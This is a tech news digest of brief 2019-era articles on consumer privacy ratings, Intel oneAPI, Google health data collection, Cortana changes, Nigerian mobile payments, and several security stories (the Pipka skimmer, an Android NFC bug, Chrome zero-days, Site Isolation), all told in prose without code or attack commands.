Mozilla has released a list of connected devices that it deems “Privacy Not Included” gadgets based on creepiness and their lacking of basic security standards.

While the report is supposed to forewarn users on what not to buy in the holiday shopping, it also help to identify which connected devices and gadgets are trustworthy and protect the privacy of their customers.

According to Mozilla, most of the smart home devices from Google, Amazon and Facebook posed some privacy risks, with the likes of Amazon Ring, haven been compromised in the past, and it's capable of eavesdropping using GPS data, also it remains unclear if users can delete data that are accumulated on the device.



Mozilla also cited similar issue with the Amazon Ring Indoor Cam, noting that stored customer data such as video recordings are not encrypted on Amazon cloud server and access could be gained on any of these data by its employees. Along with some other Ring products, the security cam was dinged by Mozilla for creepy policies around privacy and as Amazon aren't as transparent as they would like them to be about their data retention and deletion policies.

In the reports, Mozilla reviewed total of 76 gadgets which are available for purchase across six main categories: Smart Home, Toys & Games, Entertainment, Health & Exercise, Wearables and Pets.

The new cutting-edge technology of wearables: functional smart devices that can track your steps, monitor heart rate, or even help you to manage pain. But, it’s very important to note that these devices also collect lots of data about you and your daily activities.



Mozilla indicted the Apple Airpods, stating that "they know when they're in your ear, when you take them out, when you're talking--Hey Siri!--and when you're listening. They connect to your iPhone and your Apple Watch at the same time, so you can...get confused about which device is playing? These earbuds sound almost too smart for their own good". Either they are or really magical as Apple claims.

It scores the devices using interactive tool that allow shoppers to rate the creepiness of the products using emoji sliding scale ranging from Not Creepy to Super Creepy.

Albeit, Google Home passed Mozilla’s security standards, it was still rated “super creepy” by users because of the fact that Google target users data through search history, location and many more sources. Also, Google’s Nest Hub Max was dubbed as “very creepy” which is less that what the Google Home was rated.

Meanwhile, the Nintendo Switch and Sonos One SL were rated as “not creepy” as they passed Mozilla’s privacy standards, though the three Apple products had some privacy concerns that could allow someone to spy on users via the microphone, camera, and location tracking.

Mozilla releases #PrivacyNotIncluded List of Smart Speakers and Wireless devices



Intel’s oneAPI project has been unveiled to deliver unified programming model that simplify application development across multi-architectural computing systems.

The oneAPI will help facilitate programming of CPU and accelerator using the modern C++ features which expresses parallelism through new programming language known as Data Parallel C++ (DPC++).

It supports both direct and API programming, delivering a unified language and libraries to offer native code experience across a range of different hardware, like GPUs, CPUs, FPGAs and even AI accelerators.

About Data Parallel C++ (DPC++)



Data Parallel C++ (DPC++) is a new open and direct programming language that is cross-industry compliant, based on C++ and incorporates SYCL.

It's most distinguishing feature is support for open/cross-vendor applications, and been based on SYCL/C++, with Intel offering new analysis/debug tools and optimized libraries for various target domains.



DPC++ will allow developers to code across different hardware like GPUs, CPUs, FPGAs, and other accelerators with just a single source code document.

What One API Initiative means for developers?



The world’s diverse data-centric workloads means that developers have a lot of tasks to scale, as these architectures often require an efficient software programming model to deliver performance, oneAPI will help facilitate programming of CPU and accelerator using the modern C++ features.

It addresses the issue of diverse workloads with ease-of-use and performance based programming model, while also eliminating the need to maintain different code bases, multi-language programming, and diverse workflows.

The oneAPI’s libraries span several domains that benefit from workload acceleration, with library functions that are custom-coded for each of the target architecture.

Intel has promised to deliver enhanced versions of analytics and debug tools for DPC++ and other range of SVMS architectures, with the release of a developer beta and more details on the project within this fourth quarter.

Intel’s Unified Programming Model, oneAPI to cover diverse Architectures



Google has confirmed collecting Healthcare Data in a controversy that was fueled by The Washington Post report that the NIH (National Institutes of Health) stopped the company from posting over 100,000 human x-rays.

The report that was credited to a whistle-blower revealed that a program, dubbed Project Nightingale, involving Ascension – the Catholic health system with over 50 million medical records from healthcare providers, has Google working with U.S. healthcare systems to collect private medical data from millions of Americans.

Google claimed to have revealed its plans to use cloud data analytics to cull medical data from Ascension's patient information during a Q2 earnings call in July, though it was never mentioned as "Project Nightingale" during that call.

Albeit, the x-rays were part of Google's 2017 joint project with the NIH, but the agency discovered that the images contained some personally identifiable information (PII) of patients.

While Google has an Agreement with Ascension, who governs access to the Protected Health Information (PHI) for helping providers support patient care, irrespective of the legality, the sheer collection of private medical data without the individuals approval has raised criticism from patients and lawmakers who have demanded federal inquiry into the practice.

It is common knowledge that several healthcare providers are storing patient medical data for analytics purposes in the cloud, with services like Amazon Web Services, Google Cloud and Microsoft's Azure. However, the current controversy means that Google or any of the other tech companies can't be trusted with such sensitive information.

Notwithstanding, the U.S. HIPAA rules allowed a multi-billion-dollar market in the anonymized patient medical data in recent years, with many firms collecting and data-mining millions of patients.

Also, Apple collects data from users of its smartwatches as part of a gynecological study with the NIH aimed at improving fertility and early disease detection.

Google confirms collecting Healthcare Data and Anonymizing it for research



Google had always been a staunch supporter on improving the speed of websites, with such technologies as Service Workers, of which the company was a party in the draft specifying how Service Workers should be implemented in browsers.

While the proposal for Service Workers is to serve as in-browser proxy that gives the power to script what happened on the browser before going to the network, and from the network, to ensure sites are responsive and always available, it helps to speed up delivery of Web content by reducing the back-and-forth communication between browser and a server.

Now, Google is looking on badging intended to identify sites that are coded in ways that make them slow, through the historic load latency. Further more, it may expand this to include identifying a page that is likely to be slow for users based on device and network conditions.



Even as speed had been one of Chrome browser’s core principles, Google has constantly worked to better users experience as they browse the web. And in a bid to make the web work better and to help users understand sites that are likely to load slowly, it has undertaken to implement the badge while already rewarding websites delivering fast experiences with higher rankings.

Google will look at a number of Chrome interfaces, including loading or splash screen, the context-menu for links and also loading progress bar. The context-menu for links could enable more insight into the typical site speeds so users are aware before navigating it.

But before it takes off with the badging, Google promises to publish updates on the plan as it approaches the release, albeit you don’t have to wait to optimize your site. It points to a number of resources, including PageSpeed Insights, and Lighthouse, a lab tool that have been made available for learning what your site's opportunities are and options available for improving the speed of your site.

Chrome browser to Display Badge Identifying Websites that are typically slow



Microsoft's release of the digital assistant on third-party platforms was heralded as great move to bring users to its ecosystem, but now there are plans to remove the Cortana app from Android and iOS devices come January 31, 2020.

While Microsoft had earlier offered a glimpse of the digital assistant, Cortana in the workplace, for use in its growing portfolio of productivity tools. And perhaps, the company wants to concentrate its effort on winning the enterprise with the discontinuation of support for the Cortana app.

According to the company, Cortana would be integrated into Microsoft 365 productivity tool, with the apps on Android and iOS removed in select market. At which point, all users content created via the app, such as reminders and lists, will no longer function within the app or Microsoft Launcher, but would still be accessible on the Windows platform.

Also, the reminders, lists, and tasks created via Cortana would be automatically synced to the Microsoft To Do app, which can be downloaded for free on Android and iOS devices.

Microsoft, however did not specify the regions these changes will apply, though the document detailing the changes was found on Microsoft UK, Microsoft Canada, and Microsoft Australia’s website. But it's not confirmed if the Cortana app will still be available in the US.

It planned bringing new features to Cortana, including: the ability to send summary of upcoming meetings and relevant documents, with new Scheduler feature and by simply “cc-ing” Cortana into a mail, a user can book a call or locate a meeting room and a series of other options based on availability.

The roll out of the integration of Cortana into Microsoft 365 productivity tool will commence on January 31, 2020, which will also be the date of the removal of Cortana app from Android and iOS platforms.

Microsoft to restrict its digital assistant to the Windows platform



Pipka, the newly discovered web skimming script can remove every trace from host website after execution, making it almost impossible to detect.

The research team from Visa’s Payment Fraud Disruption (PFD) discovered this new skimming script on the website of a merchant located in North America, though the website had been previously infected with Inter, another popular card skimmer. And on further investigation by the team, it uncovered about 16 other merchant websites that are also infected with Pipka.

Albeit, web payment skimming attack has been popular lately, owing to the rise of Magecart which shopping cart skimmers attacked over a dozen retailers. But despite running the same skimmer, these groups used a different technique and method to inject the malicious script into targeted sites.

What is Web Skimming?



The theft of card details from eCommerce sites through the use of malicious scripts injected into the websites, is known as Web skimming. While the scripts are injected into the retailer's checkout pages to steal credit card information as customers enter their card details on purchase of an item.

And some notable skimming attacks were those waged by Magecart, which is an umbrella organization made up of a dozen groups that have been targeting e-commerce sites of several major organizations, including Ticketmaster and British Airways, over the past 12 months.

The cases involving Magecart, according to security researchers had the attackers re-inject the malicious script into retailers check-out websites, even after been detected by the security teams.

How is Pipka different from Magecart?



Unlike Magecart, Pipka is very customizable, allowing attackers to configure which form fields exactly they are targeting to steal its data. And the stolen data is also stored as a cookie in encrypted form, which is then ex-filtrated to their command-and-control server.

The attackers can target even two-step checkout pages by configuring fields for both the billing data and payment account data, which makes it most interesting, with its ability to remove all traces, by deleting itself from the webpage after execution.

How to Protect Your e-Commerce site from Pipka



It is advised that website administrators should add recurring checks in eCommerce environments for communications with any known skimmers' command-and-control servers. This is to enable them to regularly scan their websites for malware, and to vet the content delivery networks and any other third-party code loaded by partners onto their websites.

Other measures is to ensure the shopping cart software are up-to-date and patched, and using of strong passwords, including the limiting of access to the administrative portal and using an external checkout solutions.

How newly discovered Web Skimming script, Pipka can run undetected



The proliferation of smartphone has massively impacted on the business environment in Nigeria, with several mobile payment platforms jostling for the consumers' wallet. Whether making payment for utility bills or transfer of funds to friends and family, there are many mobile apps to take care of that, and Nigerians are getting used to these mobile payment systems.

While there are some old players like Interswitch with its Quickteller platform and Paga, but we'd be considering the two new comers that have shown great potentials, namely PalmPay and OPay.

The entrance of these two mobile mobile platforms is considered a good opportunity for fintech startup businesses and perhaps it will be the major reason for the disruption that is expected to happen in the banking sector.

About PalmPay



PalmPay is headquartered in the UK, and offers packages of mobile-based financial services, which includes bill payments, rewards programs and discounted airtime purchase.



The company has just recently launched into the Nigerian market, haven raised a $40 million seed funding round led by the Chinese smartphone maker Transsion Holdings. PalmPay got the approval of the Central Bank of Nigeria (CBN) to operate as a licensed mobile money operator in July 2019 and during the pilot phase, the mobile payments venture registered about 100,000 users, with 1 million transactions processed, according to the company's spokesperson.

Its initial focus will be mainly on mobile payments, though the sector has lately become a bit crowded — with hundreds of startups already competing for Nigeria’s fintech space, looking to bring scalable mobile money solutions for the country’s financial problems.

About OPay



OPay, which is an offshoot of Opera Group, also the owners of the renown mobile browser, Opera Mini, is also targeting the unbanked Nigerians and also offering bike and tricycle hailing services, along with quick loans and food delivery. OPay is sort of a super mobile app that seems to have the services every Nigeria may ever require.



The mobile payment platform, OPay is perhaps born from the acquisition of PayCom by Opera in 2017, and serves to help propel the company's vision for open, connected Internet world to build products that will remove the barriers to impede people from getting online.

Opera already boasts of facilitating the bringing of about half of Africa’s internet population online, that's out of the 464,923,169 Web users in Africa, Opera claims about 120 million people are using its mobile applications.

How OPay and PalmPay will Impact mobile payments in Nigeria



Both OPay and PalmPay have heavy backings from multinationals, and so their financial muscles are not in any doubts. PalmPay has got Visa partnership, allowing them to deliver Visa products on top of their customers' wallet, like linking their wallet to Visa products and have access to completely unbanked users with the whole of the Visa network.

While OPay already have a plethora of customers from its other services like OFood, ORide, OTrike and also the newer services, like OKash, OBus and Owealth, that are still gearing up for full operations. OPay definitely offer what people are interested in, such as ride-hailing business for Lagos commuters with government-approved bikes, buses and even tricycles, and also providing insurance cover for both the drivers and riders.

PalmPay, on the other hand, have some strategic advantage which includes Reeve’s leadership experience in Africa, Transsion’s support and network (makers of Tecno, Infinix and Itel mobile phones), and partnership with Visa.

Now, the battle line has been drawn for the leadership of the Nigerian mobile money ecosystem, and most definitely, the would-be leader will be coming from one of the above.

PalmPay vs OPay: Battle for Nigerians wallet by Money Apps and Reward Systems



Microsoft has unified the Configuration Manager (ConfigMgr) with Intune unified endpoint management (UEM) platform, which combination is now known as Endpoint Manager, with users able to access all within a single interface.

While ConfigMgr and Intune have played almost same role, serving as on-premises and cloud management tools, and also co-management options to the provision and deployment of secure endpoints and applications across the enterprise. But with Endpoint Manager, Microsoft is looking at the convergence of Intune and ConfigMgr functionality to offer seamless, end-to-end management solution devoid of the complexity of disruption in productivity.

The Endpoint Manager provides transformative management and security to meet customers peculiar needs, which is available everywhere and also helpful in their future migration to the cloud.

Additionally, Microsoft Endpoint Manager include the following: Desktop Analytics and Device Management Admin Center (DMAC), along with the simplification of licensing, as it seeks to make the licensing to Intune equally available to ConfigMgr customers in co-managing their Windows devices.

For customers who wish to manage non-Windows devices with Microsoft Endpoint Manager, they will need to first purchase either an Intune license, EMS (Enterprise Mobility & Security) license, or a Microsoft 365 E3 or higher license, according to the company.

The roll out of Endpoint Manager, including all the features and capabilities will start over the coming months for supported products.

Microsoft's unification of Configuration Manager (ConfigMgr) and UEM platform



Delegated Credentials for TLS, is the technical specifications for new cryptographic protocol announced by Mozilla, in conjunction with Cloudflare, Facebook, and some other members of IETF community.

The new cryptographic protocol will prevent the misuse of stolen certificates by the reduction on maximum validity period of such certificate to a short period of time, like days or even hours, instead of several years. It is a rather simplified way to make certificates "short-lived" without necessarily sacrificing the reliability of the secure connections.

While HTTPS-protected website provides its TLS certificate to the web browser for confirmation of identity before the actual exchange of information, including passwords and other sensitive data, such certificates are expected to last for the entire validity period, but some certificate can go bad before its expiration date for different reasons.

And the main reason a certificate can go bad before expiration, is when the secret private key corresponding to the certificate has been stolen, or the certificate was issued fraudulently, allowing attackers to impersonate the targeted server or spy on encrypted connections via man-in-the-middle attack.

There are over 70% of websites on the Internet currently using TLS certificates to establish secure route of HTTPS communication between the servers and visitors, which ensures the privacy and integrity of data being exchanged, so obtaining TLS certificate from any Certificate Authority (CA) need to be trusted by all major browsers.

Now, the major tech companies like Google, Facebook, and Cloudflare do offer services from several different servers scattered all over the world, and distribute private certificate keys to every one of the servers, which process increases the risk of compromise.

The compromise of certificate before its expiration date, allows only one option for the website operator, that is to request for the certificate authority to revoke the certificate and reissue new one in its place with a different private key.

But the revocation mechanisms are equally broken in practice, because the browsers should normally be able to promptly detect none-trusted certificates so as to proactively prevent users from getting connected to a compromised server, until it gets a new valid certificate.

So modern browsers either use cached validation of a certificate for awhile or assume it is still valid in cases the browser did not receive a valid response from the CA or encounter connection error. In order to further reduce this time frame, most web companies have already started experimenting on certificates with shorter validation period, after which the browser will reject them instead of waiting for revocation signal.

The problem with this experiments is that the CA is separate organization, which a website server would need to fetch new certificates from more frequently, and there's no reliable way for the companies to continuously rotate certificates after every hours or few days.

The IETF community members sort to tackle the issue by proposing for the Delegated Credentials for TLS, as a new cryptographic protocol that will balance the trade-off processes. So now, instead of the deployment of the actual private key to all servers by the CA, the companies can now generate it internally, and deploy as delegated credentials.

How the Delegated Credentials For TLS will boost TLS Protocol Security



Google has entered into partnership with some mobile security companies, which it calls ‘App Defense Alliance‘ to help in early detection of malicious apps targeting its mobile software, Android.

While the Internet giant is for the first time, seeking the help of third-party security companies in making Android more secure, by detecting potential threats in apps and also improve security for the ecosystem.

Google is enlisting the help of Zimperium, ESET and Lookout in forming the App Defense Alliance, with the aim of tackling one of Android's major problem, with malicious apps affecting users on the mobile platform every now and then.

The new initiative is to combat the menace and ensure that the mobile users are better protected, as the safety of its users is paramount in the effort to stop malicious apps from reaching those devices.



In a similar move, Microsoft has also integrated third-party mobile threat defense systems with its unified endpoint management (UEM), Intune platform, which will enable corporate customers to detect an unenrolled smartphone or tablet that's potentially infected by malware.

These moves will be generally helpful for enterprises with BYOD (bring-your-own device) policies, in that they can now be able to effectively block access to enterprise systems on devices flagged by the mobile threat defense software.

Albeit, the App Defense Alliance will adopt a proactive approach towards harmful apps, along with Google Play Protect service that scan installed apps on Android device, making double sure that potentially harmful apps are detected before been published on the Play Store.

Google, as part of the alliance, will integrate Play Protect Detection system with the partners’ scanning engines, which results to multi-monitoring systems to detect and prevent malicious apps from getting to the Play Store.

While Microsoft already offers threat defense system for enterprise PCs through the Microsoft Defender firewall, which makes it a natural evolution to offer it for Android and iOS devices. Google involving third-party security companies, on its part, shows it truly wants to make the Android ecosystem more secure.

Google Enters ‘App Defense Alliance’ to help detect Malicious Android Apps



Microsoft had earlier offered a glimpse of the virtual assistant, Cortana in the workplace, now the company has fully targeted it for duties in its growing portfolio of productivity tools.

First off, Microsoft brings a hands-free way to follow up on emails, with Cortana offering a summary of all new emails a user has received in the past 24 hours, with an estimation of how long it will take to read them all. Now, the AI voice assistant can highlight changes to the calendar and potentially be able to schedule events for that day, via the integration with Outlook’s Calendar app.

Cortana will also be able to inform you on how long emails have been sitting in the inbox, and additional information such as the identity of the sender or if the email contains any attachments, including links and embedded files.

Gartner Research had predicted that over 25 percent of digital workers will be using virtual assistants on daily basis starting from 2021; and this is opportunity for SMBs to employ virtual assistant technology in the daily auxiliary office processes, which in turn will give them more time to attend to other customers issues, as it will reduce delays in communications.



Microsoft has touted the Play My Emails feature as more like a conversation with ones personal assistant than just basic conversion of email from text to audio. By simply saying “Hey, Cortana” a user can interrupt the readout to give further commands (such as skipping messages, or flagging email for later reading or archiving them) or even to dictate the email response using the natural voice and language recognition.

No doubt, Microsoft is having a vantage position to win in the race for Office dominance, as it already boasts of the most popular business apps with Office 365, with currently over 200 million monthly active users globally. However, Microsoft will have to prove it can truly deliver on the promise of more natural conversations.

Microsoft has even added a masculine voice option to Cortana for interactions, and users can easily access the option from the Outlook app’s settings. While a scheduler feature is currently in preview and hopefully, will be generally available next year.

Additional features coming soon to Cortana, includes: ability to send daily briefing email with summary of upcoming meetings and relevant documents, also set up meetings with new Scheduler feature and simply by “cc-ing” Cortana into a mail, a user can ask the AI assistant to book a call or locate a meeting room and it will present a series of options based on availability.

Microsoft AI-powered voice assistant, Cortana makes further inroad into Workplace



Microsoft's web-based version of its Code Editor, Visual Studio Online, which was previously in a private testing with select developers, has now been opened to the public.

The new online editor, Visual Studio Online, will enable developers to quickly configure a development environment for their repositories and also work on their code. It provides a cloud-powered development environments, capable of handling long-term project, or even a short-term task, on a browser-based editor that's accessible anywhere.

Visual Studio Online, among other things will bring the benefits of DevOps, such as reliability and scalability, which typically worked for production workloads, to the development environments.



It not only allow development environments customization per project, but also layers on individual personalization to make the Cloud-hosted environments feel more natural to use. The Online editor also allow developers to leverage all the tools, processes and configurations that they've already come to love and rely on the best of both worlds.

Besides the cloud-hosted environments, Visual Studio Online allows you to register and connect own self-hosted environments, or an environment you've already perfectly tuned and recorded some of the benefits of Visual Studio Online, all for free.

And every Visual Studio Online environment has been carefully crafted with the needs of specific project or task, which can either be accomplished automatically with smart-configuration features, or you can finely tune environments using JSON and Dockerfile configuration overrides.

These dynamic environments are also quick to create, reproducible and reliable - enabling easy onboarding for team members to your project, and you can get started on new projects that otherwise would be cumbersome to try out before now.

Additionally, the reproducible development environments practically eliminates the so-called Works on my machine issue.

Microsoft releases the Online Version of the Code Editor, Visual Studio Online



NFC works with Android Beam, which service allows Android devices to send images, videos, and other files, or even apps, to another nearby device using Near-Field Communication radio waves, alternative to WiFi and Bluetooth technology.

While files sent via NFC beaming results a prompt on the receiving device asking for permission to install the file from an unknown source, but starting with Android 8 (Oreo) and above, if you send an app to someone via NFC beaming, no such prompt appears and the installation of the app happens in just a tap.

Google displays a warning whenever an Android user tries to install app that is not directly downloaded from Play Store, the bug is that on Android Oreo and above devices, NFC beaming does not explicitly require users' permission, whether they wish to go ahead with installation of app from unknown sources.



Albeit, some certain apps such as Dropbox app and Google Chrome are whitelisted and can be installed without the security warnings or notification.

The reasons this bug is such a big deal, is that new Android devices have the NFC feature enabled by default and wouldn’t even show if the feature is active on your smartphone. It works once you hold two devices in close proximity, between 4cm or 1.5 inches apart, so if a hacker needs to send malware to your Android device, he only needs to bring his smartphone close to your device.

Google acknowledged the bug (CVE-2019-2114) as affecting Android devices running Android 8.0 (Oreo) or above by allowing anyone, including bad actors to send malware discreetly to smartphone via NFC beaming.

The company has promptly released a fix, and by removing the NFC Beaming feature from whitelisted apps. However, it is advised that you turn off the NFC feature and Android Beam on your device, and users should update their Android OS to the latest software if available for their device.

How To Protect Your Android Smartphone from the NFC beaming bug



Google has issued a warning to Chrome users to urgently upgrade their browser, with Chrome 78.0.3904.87 release, containing a patch for two highly severe vulnerabilities, one of which is already been actively exploited in the wild by attackers to hijack PCs.

According to the Chrome security team, both issues are use-after-free vulnerabilities, with the first affecting Chrome's audio component (CVE-2019-13720) while the second vulnerability resides in the PDFium (CVE-2019-13721) library, for Windows, Mac, and Linux computers.

While a use-after-free vulnerability is class of memory corruption issues that allows modification of data in the PC memory, enabling an attacker to gain privilege to an affected system. And both flaws could allow remote attackers to gain privileges on Chrome browser by convincing targeted users into visiting maliciously crafted website, enabling them to run arbitrary code on the affected system.

The discovery of the flaws was credited to Kaspersky researchers, Anton Ivanov and Alexey Kulaev, with the audio component in Chrome application already been exploited in the wild, though it is not yet clear which specific hackers or group are targeting the flaw.

Kaspersky also traced the exploit to a compromised Korean-language news portal, which the attackers haven installed the first stage malware on the target systems after exploiting Chrome vulnerability (CVE-2019-13720), then connects to a remote command-and-control server to download final payload.

Google also released urgent security patches for Chrome to fix other use-after-free vulnerabilities in different components of the web browser, with the most severe of which allow remote hackers to take control of affected system.

Chrome users are advised to update the software on their systems, and whenever possible, as a non-privileged user in order to diminish the effects of any attack exploiting the zero-day vulnerability. Albeit, Chrome browser update happens automatically, and notifies users about the latest available version, but still users are recommended to trigger the update process by going to menu: Help → About Google Chrome.

Warnings: Two Chrome vulnerabilities actively Exploited in the wild to hijack PCs



Google has touted Site Isolation in Chrome 77 on desktop as capable of defending against significantly stronger attacks; even in scenario where the renderer process is compromised, such as Universal Cross-Site Scripting (UXSS) logic errors.

The security mechanism initially targeted Spectre-like attacks which leads to data leaks from given renderer process, but starting with Chrome 77, Site Isolation will be able to handle severe attacks whereby the renderer process is completely compromised through security bugs, such as bugs related to memory corruption or UXSS logic errors.

What this means is that Google has extended the advanced defensive technology to protect against such attacks as exploiting vulnerabilities in the browser's rendering engine, Blink.

The site isolation works by limiting Blink rendering engine process to pages from a single website, thus effectively isolating a rendered page from other sites. And as malicious websites try to exploit a vulnerability, the attack site would be denied access, so the hackers won't be able to access users' data, such as corporate information.

Albeit, a bug might allow an attacker to run arbitrary native code within the sandboxed renderer process, given that an attacker exploited a known memory corruption bug in Chrome's rendering engine, and it can no longer be constrained by the security checks in Blink.

But, Chrome's browser process understands what website the renderer is processing at a time, so it will restrict cookies, passwords, and other site data from the entire process, making it far more difficult for attackers to steal cross-site data.

Also, the Android version of Chrome 77 sports the site isolation technology, which on previous versions wasn't enabled, but only for desktop. And for the desktop platforms, isolation is turned on for all sites, while for Chrome on Android isolation happens per site basis, and only active for websites that process sensitive data.

The feature starts with Chrome 77 for Android, and is enabled for about 99% of users running Android devices with a RAM of at least 2GB, and a 1% holdback for monitoring performance.

Google takes Site Isolation a notch higher in Chrome 77 against attacks